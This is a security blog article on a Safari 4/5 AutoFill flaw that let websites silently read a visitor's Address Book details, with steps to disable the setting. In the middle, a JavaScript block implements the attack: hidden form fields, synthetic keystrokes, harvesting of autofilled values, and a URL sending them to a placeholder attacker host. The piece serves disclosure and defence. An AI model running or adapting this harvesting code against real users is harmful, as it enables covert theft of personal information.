How to Fix Apple Safari’s Autofill Security Threat

Jeremiah Grossman, founder and Chief Technology Officer of WhiteHat Security, disclosed a privacy flaw built into Apple’s Safari web browser. With nearly 4.9% of people browsing the web using Safari, this flaw may have exposed the personal information of quite a few people.

Built into Apple’s Safari web browser is a convenient AutoFill feature. This feature allows Safari to remember your usernames, passwords, and personal information. AutoFill is a feature that is found on nearly all web browsers in use today. However, as Grossman points out, not all AutoFill features are created equal. Safari has an alarming AutoFill-related security flaw that all Safari users need to be aware of.


When a Safari user visits a website, that website can read the user’s personal information, even if the user has never visited it before or typed anything into it. A malicious website can obtain the user’s first and last name, workplace, city, state, and email address. The cause is a preference in Safari’s AutoFill feature that is turned on by default: “AutoFill web forms: Using info from my Address Book Card”.

With this setting enabled, a malicious website can extract the visitor’s Address Book Card data without any interaction from the user. All the website has to do, Grossman explains, is “dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript. When data is populated, that is AutoFill’ed, it can be accessed and sent to the attacker.”
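To make the technique concrete, here is an added illustration of the steps Grossman describes. It is not his proof of concept and not code from the original article. Two things are assumptions: the input names used (Safari matched AutoFill against the name/id attributes of text fields, but which exact names mapped to which Address Book fields is not stated here), and that Safari 4/5 completed a field once a typed letter matched the first letter of the stored value, which is why the keystrokes run A to Z. Modern browsers do not AutoFill in response to synthetic keystrokes, so in a current browser this harvests nothing; the constructed fake document and sample card exist only so the flow can be run offline under Node and followed end to end.

```javascript
// Added illustration of the extraction technique described above. It is not
// Grossman's proof of concept or the article's code. Assumptions: the input
// names below (Safari matched AutoFill on the name/id attributes of text
// fields; the exact names are not given on this page) and that Safari 4/5
// completed a field when a typed letter matched the first letter of the stored
// card value. Modern browsers ignore synthetic keystrokes for AutoFill; the
// fake document at the bottom lets the flow run offline in Node.

const PROBE_FIELDS = ["name", "company", "city", "state", "email"]; // assumed names
const KEYS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; // "simulate A-Z keystroke events"

// 1. Build the hidden form: one text field per Address Book attribute we want.
function buildProbeForm(doc) {
  const form = doc.createElement("form");
  form.style.position = "absolute";
  form.style.left = "-9999px"; // off-screen: the victim never sees the fields
  for (const name of PROBE_FIELDS) {
    const input = doc.createElement("input");
    input.type = "text";
    input.name = name;
    input.id = name;
    form.appendChild(input);
  }
  doc.body.appendChild(form);
  return form;
}

// 2. Fire a synthetic keydown for one letter at one field.
function dispatchKey(doc, input, letter) {
  let ev;
  if (typeof KeyboardEvent === "function") {
    ev = new KeyboardEvent("keydown", { key: letter, bubbles: true });
  } else {
    // Older WebKit API; argument order assumed (type, bubbles, cancelable,
    // view, keyIdentifier, location, ctrl, alt, shift, meta).
    ev = doc.createEvent("KeyboardEvent");
    ev.initKeyboardEvent("keydown", true, true, null, letter, 0, false, false, false, false);
  }
  input.dispatchEvent(ev);
}

// 3. For each field try A-Z until AutoFill populates it, then record the value.
function harvestAddressBook(doc) {
  const form = buildProbeForm(doc);
  const stolen = {};
  for (const input of Array.from(form.elements)) {
    for (const letter of KEYS) {
      dispatchKey(doc, input, letter);
      if (input.value) { // AutoFill completed the field
        stolen[input.name] = input.value;
        break;
      }
    }
  }
  doc.body.removeChild(form); // clean up so nothing is visible afterwards
  return stolen;
}

// 4. Package the harvested data for an attacker-controlled endpoint (placeholder URL).
function exfilUrl(stolen, endpoint = "https://attacker.invalid/collect") {
  return endpoint + "?" + new URLSearchParams(stolen).toString();
}

// Constructed stand-in for the Safari 4/5 DOM plus an Address Book card, so the
// block runs without a browser. Card contents are made up.
function makeFakeDocument(card) {
  const makeInput = () => ({
    type: "text", name: "", id: "", value: "", style: {},
    dispatchEvent(ev) {
      const stored = card[this.name];
      if (stored && stored[0].toUpperCase() === ev.key.toUpperCase()) this.value = stored;
      return true;
    },
  });
  const makeNode = () => ({ style: {}, elements: [], appendChild(n) { this.elements.push(n); return n; } });
  return {
    body: {
      children: [],
      appendChild(n) { this.children.push(n); return n; },
      removeChild(n) { this.children = this.children.filter((c) => c !== n); return n; },
    },
    createElement: (tag) => (tag === "input" ? makeInput() : makeNode()),
    createEvent: () => ({
      initKeyboardEvent(type, _bubbles, _cancelable, _view, key) { this.type = type; this.key = key; },
    }),
  };
}

const SAMPLE_CARD = { // constructed victim card
  name: "Alice Example", company: "Example Corp", city: "Cupertino",
  state: "CA", email: "alice@example.com",
};

// In a real Safari 4/5 session the call would be harvestAddressBook(document).
const stolen = harvestAddressBook(makeFakeDocument(SAMPLE_CARD));
console.log(stolen);
console.log(exfilUrl(stolen));
```

The important point is that nothing in this flow requires the user to click, type, or even notice the form: the page creates the fields, "types" into them itself, and reads back whatever AutoFill supplies. Unchecking the Address Book option removes the data source, which is why the one-line preference change below is the whole fix.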


Safari users do not need to switch browsers because of this flaw. All they need to do to protect themselves is change one setting in Safari’s preferences. Here’s how:

  1. Open Safari
  2. Select Safari from the menu bar at the top of the screen
  3. Select Preferences
  4. Select the AutoFill tab
  5. Uncheck “Using info from my Address Book card”

That’s it. Note that this flaw is only present in Safari versions 4 and 5. To find out which version you have, select Safari > About Safari in the menu bar.

Via Jeremiah Grossman
